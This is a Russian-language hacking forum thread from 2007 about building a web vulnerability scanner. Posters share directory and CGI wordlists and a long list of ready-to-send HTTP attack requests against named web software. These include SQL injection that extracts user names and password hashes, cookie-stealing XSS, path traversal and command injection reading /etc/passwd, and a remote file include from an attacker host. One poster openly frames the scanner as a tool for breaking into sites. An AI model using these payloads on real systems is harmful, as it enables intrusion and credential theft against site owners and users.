/foto/
/fotos/
/g/
/gallery/
/general/
/get/
/global/
/gold/
/group/
/groups/
/guest/
/GXApp/
/gui/
/h/
/HB/
/help/
/hide/
/home/
/host/
/hosts/
/i/
/ibank/
/ibill/
/iisadmin/
/iisadmpwd/
/iishelp/
/iissamples/
/image/
/images/
/images2/
/img/
/inc/
/include/
/index/
/info/
/ini/
/international/
/ip/
/isapi/
/j/
/java/
/jdbc/
/js/
/jserv/
/jsp/
/k/
/key/
/keys/
/l/
/labs/
/lib/
/library/
/list/
/link/
/links/
/log/
/Log/
/login/
/logins/
/logon/
/logout/
/logs/
/look/
/m/
/mail/
/Mail/
/mailroot/
/mails/
/makefile/
/manager/
/master/
/members/
/mirago/
/money/
/mpej/
/mrtg/
/msadc/
/MSMQ/
/mssql/
/music/
/mysql/
/n/
/net/
/netcat/
/network/
/new/
/NSearch/
/o/
/odbc/
/oetaki/
/old/
/operator/
/order/
/orders/
/p/
/pas/
/pass/
/passport/
/passwd/
/password/
/passwords/
/path/
/paths/
/PBSData/
/PBServer/
/perl/
/perl5/
/phone/
/phones/
/photo/
/php/
/phpBB/
/phpnuke/
/phpproject/
/picture/
/pictures/
/post/
/port/
/postgres/
/printer/
/printers/
/priv/
/private/
/product/
/products/
/pub/
/public/
/q/
/r/
/rdp/
/read/
/REC-html40/
/register/
/registration/
/remote/
/rep/
/report/
/reports/
/res/
/resource/
/resources/
/result/
/results/
/root/
/rpc/
/s/
/sample/
/samples/
/save/
/scripts/
/search/
/secure/
/security/
/send/
/servers/
/service/
/services/
/session/
/sessions/
/set/
/sets/
/setting/
/settings/
/setup/
/shutdown/
/silver/
/slave/
/soft/
/sound/
/source/
/sources/
/src/
/ssl/
/ssi/
/stat/
/stats/
/status/
/style/
/sys/
/sysadmin/
/sysinfo/
/sysman/
/sysop/
/system/
/sql/
/system32/
/t/
/temp/
/template/
/templates/
/test/
/test-cgi/
/test12/
/ToDo/
/tmp/
/TR/
/tree/
/trust/
/tsweb/
/u/
/uddi/
/uddipublic/
/unix/
/update/
/updates/
/upload/
/usage/
/user/
/users/
/util/
/utils/
/uucp/
/v/
/var/
/video/
/view/
/w/
/webaccess/
/webadmin/
/webboard/
/WebBank/
/weblog/
/WebShop/
/write/
/wwwlog/
/wwwroot/
/x/
/xml/
/y/
/z/
/zip/
/_backup/
/_errors/
/_mem_bin/
/_pages/
/_private/
/_scripts/
/_vti_bin/
/_vti_bot/
/_vti_cnf/
/_vti_log/
/_vti_pvt/
/_vti_script/
/_vti_shm/
/_vti_txt/
/001/
/002/
/000/
|
|
|
|
22.02.2007, 22:59
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091
Репутация:
1686
|
|
помню была был Ru24-NRG Tools сканер там хорошая база
|
|
|
|
22.02.2007, 23:00
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
PHP код:
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/rwwwshell.pl
/cgi-bin/gH.cgi
/cgi-bin/phf H
/cgi-bin/phf.cgi
/cgi-bin/Count.cgi
/cgi-bin/test-cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/php.cgi
/cgi-bin/php
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay
/cgi-bin/perl.exe
/cgi-bin/wwwboard.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.cgi
/cgi-bin/maillist.cgi
/cgi-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/edit.pl
/cgi-bin/perlshop.cgi
/cgi-bin/webbbs.cgi
/cgi-bin/whois_raw.cgi
/cgi-bin/AnyBoard.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/login.cgi
/test/test.cgi
/cgi-dos/args.bat
/cgi-win/uploader.exe
/cgi-bin/rguest.exe
/cgi-bin/wguest.exe
/cgi-bin/cgi-lib.pl
/cgi-bin/minimal.exe
/cgi-bin/redir.exe
/cgi-bin/stats.prg
/cgi-bin/statsconfig
/cgi-bin/visitor.exe
/cgi-bin/htmldocs
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/ax.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/query
|
|
|
|
22.02.2007, 23:03
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
[sL1p] и D=P=CH= MOD=
У меня такие базы есть, под несколько мегабайт...
Но вы не совсем поняли суть работы скрипта....Ему конечно можно задать, чтобы он просто чекал на наличие файлов/папок, простым добавлением в его базу файлы/папки и status=200. Но сами понимаете, что толку тогда от работы сканера не будет....только зря траф прогоняете, а из этих списков нихрена толкового нету....
Сканер ищет скрипты и проверяет их на уязвимость, что даёт просто огромный толчок для взлома сайта.. Т.е. нужно составлять базу из наиболее популярных скриптов и критических уязвимостей к ним, чтобы пробив был максимальным.
|
|
|
|
22.02.2007, 23:05
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
PHP код:
/eatme.idc HTTP/1.1
/eatme.ida HTTP/1.1
/eatme.pl HTTP/1.1
/eatme.idq HTTP/1.1
/eatme.idw HTTP/1.1
/PSUser/PSCOErrPage.htm HTTP/1.1
/log HTTP/1.1
/stats HTTP/1.1
/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* HTTP/1.1
GET <weburl>/news.php?list.99/**/UNION/**/SELECT/**/null,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* HTTP/1.1
GET <weburl>/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/* HTTP/1.1
GET <weburl>/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/* HTTP/1.1
GET <weburl>/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* HTTP/1.1
GET <weburl>/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* HTTP/1.1
GET <weburl>/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
GET <weburl>/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
GET <weburl>/print.php?what=article&id=X%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20from%20admins%20LIMIT%201 HTTP/1.1
GET <weburl>/print.php?what=article&id=X/**/AND/**/1=0/**/UNION/**/SELECT/**/id,id,nick,pass,id,id,id,id,id/**/from/**/admins/**/LIMIT/**/1 HTTP/1.1
GET <weburl>/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini HTTP/1.1
GET <weburl>/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y HTTP/1.1
GET <weburl>/sysadmin/system/show.asp?show=<script>alert("oops")</script> HTTP/1.1
GET <weburl>/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script> HTTP/1.1
GET <weburl>/./cgi-bin/targetfile HTTP/1.1
GET <weburl>/admin/case/case.adminfaq.php/admin.php?op=FaqCatGo HTTP/1.1
GET <weburl>/admin/admin.php/index.php HTTP/1.1
GET <weburl>/admin/modules/blocks.php/admin.php HTTP/1.1
GET <weburl>/mail/mmex.php?Settings=http://msn.com HTTP/1.1
GET <weburl>/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&UPnP_Work=1&FactoryDefaults=0 HTTP/1.1
GET <weburl>/Gozila.cgi?hostName=&DomainName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168&ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1 HTTP/1.1
GET <weburl>/main.cgi?next_file=/etc/passwd HTTP/1.1
GET <weburl>/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION] HTTP/1.1
GET <weburl>/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=..\..\..\..\..\mydocuments\private\passwords.txt HTTP/1.1
GET <weburl>/cit/@@file/../../../../etc/passwd HTTP/1.1
GET <weburl>/modules.php?name=Reviews&rop=postcomment&id='&title=a HTTP/1.1
GET <weburl>/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> HTTP/1.1
GET <weburl>/vpasp/shopdisplayproducts.asp?id=5&cat=<img%20src="javascript:alert('XSS')"> HTTP/1.1
GET <weburl>/main.cgi?next_file=poop<script>alert('scriptX :P');</script> HTTP/1.1
GET <weburl>/mail/src/compose.php?mailbox="><script>window.alert(document.cookie)</script> HTTP/1.1
GET <weburl>/ssi.php?a=out&type=xml&f=<script>alert("ALOooooooooo");</script> HTTP/1.1
GET <weburl>/forum/registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%2 7%29%3C%2Fscript%3E HTTP/1.1
GET <weburl>/registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%2 7%29%3C%2Fscript%3E HTTP/1.1
GET <weburl>/chat/usersL.php3?L=russian&R='[SQL] HTTP/1.1
GET <weburl>/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/* HTTP/1.1
GET <weburl>/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOUHASHPASSWORD]&sheet=/../../../../../../etc/passwd%00 HTTP/1.1
GET <weburl>/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOUHASHPASSWORD]&sheet=1 HTTP/1.1
GET <weburl>/vpasp/shoperror.asp?msg=<img%20src="javascript:alert('XSS')"> HTTP/1.1
GET <weburl>//vpasp/shoperror.asp?msg=<meta%20http-equiv='refresh'content='0'> HTTP/1.1
GET <weburl>/mail/src/compose.php?mailbox="><script>window.alert(document.cookie)</script> HTTP/1.1
GET <weburl>/?rawURL=<script>javascript:alert();</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=friend&jid=2&yun=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=friend&jid=2&ye=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=add&filelist[]=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=modify&filelist[]=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=delete&jid=<noscript>&forwhat=waraxe HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=comment&onwhat=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=commentsave&rid=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=commentkill&onwhat=1 HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=savenew&title=f00bar HTTP/1.1
GET <weburl>/modules.php?name=Journal&file=search&bywhat=aid&exact=1%20&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* HTTP/1.1
GET <weburl>/newsletter/admin.php?f=list_user&uname=test&ulevel=1 HTTP/1.1
GET <weburl>/scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS');</script> HTTP/1.1
GET <weburl>/cgi-script/csFAQ/csFAQ.cgi?command=viewFAQ&database=/.darkbicho HTTP/1.1
GET <weburl>/show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=& HTTP/1.1
GET <weburl>/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=& HTTP/1.1
GET <weburl>/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results HTTP/1.1
GET <weburl>/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results HTTP/1.1
GET <weburl>/modules.php?name=gallery&files=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/modules.php?name=gallery&files=/../../../ HTTP/1.1
GET <weburl>/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=..\..\..\..\..\mydocuments\private\passwords.txt HTTP/1.1
GET <weburl>/chat.ghp?username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=&room=1&sex=0 HTTP/1.1
GET <weburl>/chat.ghp?username=FakeUser&password=&room=1&sex=0 HTTP/1.1
GET <weburl>/brightmail/quarantine/viewMsgDetails.do?id=QMsgView-[some-value] HTTP/1.1
GET <weburl>/?command=mkdir&filename=..// HTTP/1.1
GET <weburl>/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc HTTP/1.1
GET <weburl>/jaws/index.php?gadget=2&action=<b>boldletter</b> HTTP/1.1
GET <weburl>/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc HTTP/1.1
GET <weburl>/index.php?gadget=2&action=<b>boldletter</b> HTTP/1.1
GET <weburl>/_error?id=1&errormsg=<script>alert(document.cookie)</script> HTTP/1.1
GET <weburl>/forums/viewtopic.php?t=1&highlight=Bug,SELECT%20*%20FROM%20$table HTTP/1.1
GET <weburl>/%00 HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=english HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=<script>%20alert('XSS');</script>//<script>%20alert('XSS');</script> HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=<script>%20alert('XSS');</script>//<script>%20alert('XSS');</script>&LANGUAGE=lang//en HTTP/1.1
GET <weburl>/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/ HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../ HTTP/1.1
GET <weburl>/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=. HTTP/1.1
GET <weburl>/cgi-bin/boardpower/icq.cgi?action=<script>javascript:alert('hello');</script> HTTP/1.1
GET <weburl>/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe<script>alert(document.cookie);</script>&category_rows[0][cat_order]=99 HTTP/1.1
GET <weburl>/faq.php?faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe HTTP/1.1
GET <weburl>/faq.php?mode=bbcode&faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe HTTP/1.1
GET <weburl>/modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors HTTP/1.1
GET <weburl>/cgi-bin/web_store.cgi?page=.html|cat%20/etc/passwd| HTTP/1.1
GET <weburl>/help.php?file=<script>alert('xss');</script> HTTP/1.1
GET <weburl>/artmedic-kleinanzeigen-path/index.php?id=http://www.example.com HTTP/1.1
GET <weburl>/index.php?id=http://www.example.com HTTP/1.1
GET <weburl>/modules.php?name=Search&sid=<script>alert('hi');</script> HTTP/1.1
GET <weburl>/modules.php?name=Search&query=*&max=<script>alert('hi');</script> HTTP/1.1
GET <weburl>/modules.php?name=Search&a=6&query=*&match=<script>alert('hi');</script> HTTP/1.1
GET <weburl>/modules.php?name=Search&type=stories&query=f00bar&category=-1%20&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/* HTTP/1.1
GET <weburl>/phpBB2/search.php?search_author='<script>alert(document.cookie)</script> HTTP/1.1
GET <weburl>/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=1&title=%253cscript>alert%2528document.cookie);%253c/script> HTTP/1.1
GET <weburl>/show_news.php?subaction=addcomment&name=UserName&comments=http://www.example.com&id=1078525267||1090074219|UserName|none|127.0.0.1|<script>alert("example");</script>|| HTTP/1.1
GET <weburl>/printview.php?t=1&order_sql=UNION%20SELECT%201%20,%20user_password%20,%201,%201,%201,%201,%201,%201,%201,%201,%201,%201%20FROM%20phpbb_users%20WHERE%20user_id%20=admin%20ORDER%20BY%20t.topic_id%20ASC HTTP/1.1
GET <weburl>/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1
GET <weburl>/cit/@@file/../../../../etc/passwd HTTP/1.1
GET <weburl>/asplib/MapPassword.asp?id=140&ps=0&Wrong=1 HTTP/1.1
GET <weburl>/ErrLog/mi3errors.log HTTP/1.1
GET <weburl>/MapFrame.asp?mapID=5&mapname=<noscript> HTTP/1.1
GET <weburl>/asplib/SignIn.asp HTTP/1.1
GET <weburl>/show_archives.php?archive=[code]&subaction=list-archive& HTTP/1.1
GET <weburl>/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=/etc/passwd HTTP/1.1
GET <weburl>/stats/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=/etc/passwd HTTP/1.1
GET <weburl>/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet%20127.0.0.1%2080 HTTP/1.1
GET <weburl>/stats/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet%20127.0.0.1%2080 HTTP/1.1
GET <weburl>/mantis/core/bug_api.php?t_core_dir=http://attackers.example.com/ HTTP/1.1
GET <weburl>/core/bug_api.php?t_core_dir=http://attackers.example.com/ HTTP/1.1
GET <weburl>/login_page.php?return=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl/signup.php?username=user&email=<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/login_select_proj_page.php?ref=%22%3E<script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/demo/out/out.ViewFolder.php?folderid=3%20or%201=1 HTTP/1.1
GET <weburl>/mydms/op/op.ViewOnline.php?request=4:6:/../../../../../etc/passwd HTTP/1.1
GET <weburl>/page.php?xPage=<SCRIPT>alert(document.cookie)</SCRIPT> HTTP/1.1
GET <weburl>/news/news.mdb HTTP/1.1
GET <weburl>/news.mdb HTTP/1.1
GET <weburl>/forum/ZixForum.mdb HTTP/1.1
GET <weburl>/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60 HTTP/1.1
GET <weburl>/modules.php?name=Photo_A_Day&action=single&pad_selected=44%20UNION%20SELECT%20< script>alert(document.cookie);</script> HTTP/1.1
GET <weburl>/fusion/fusion_admin/db_backups/backup_2004-08-17_1845.sql HTTP/1.1
GET <weburl>/%2E%2E%5Csystem.log HTTP/1.1
GET <weburl>/%2E%2E\system.log HTTP/1.1
GET <weburl>/adminSection/index_next.asp?admin=SQLInjection&Pass=SQLInjection HTTP/1.1
GET <weburl>/adminSection/ChangePassword.asp?LoginId=(SQLInjection)%20OPass=(SQLInjection)%20NPass=(SQLInjection)%20CPass=(SQLInjection) HTTP/1.1
GET <weburl>/adminSection/index.asp?ShowMsg=<noscript> HTTP/1.1
GET <weburl>/adminSection/ChangePassword.asp?ShowMsg=<noscript> HTTP/1.1
GET <weburl>/adminSection/users_list.asp?ShowMsg=<noscript> HTTP/1.1
GET <weburl>/comersus_customerLoggedVerify.asp?redirecturl=%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html} HTTP/1.1
GET <weburl>/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script> HTTP/1.1
GET <weburl>/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font> HTTP/1.1
GET <weburl>/sitenews.cgi?update\?oldsubject=OLD_SUBJ&subject=NEW_SUBJ&name=ANY_NAME&issue=ISSUE&message=MESSAGE HTTP/1.1
GET <weburl>/render.UserLayoutRootNode.uP?uP_tparam=utf<noscript> HTTP/1.1
GET <weburl>/cp/render.UserLayoutRootNode.uP?uP_tparam=utf<noscript> HTTP/1.1
GET <weburl>/ShowCenter/SettingsBase.php?Skin=<noscript> HTTP/1.1
GET <weburl>/cgi-bin/nbmember.cgi?cmd=test HTTP/1.1
GET <weburl>/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword HTTP/1.1
|
|
|
|
22.02.2007, 23:30
|
|
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479
Репутация:
3813
|
|
Эххх... перл рулид, спасиб, кибирг. [little_offtop] Я вот просто думаю, нужен ли вопще тогда тот сканер (сырая пхп бетка) что я писал? Мот просто взять то что написал киби и раскрутить его как более перспективное творение на данный момент? И получится сканер под марку ачата...[/little_offtop]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
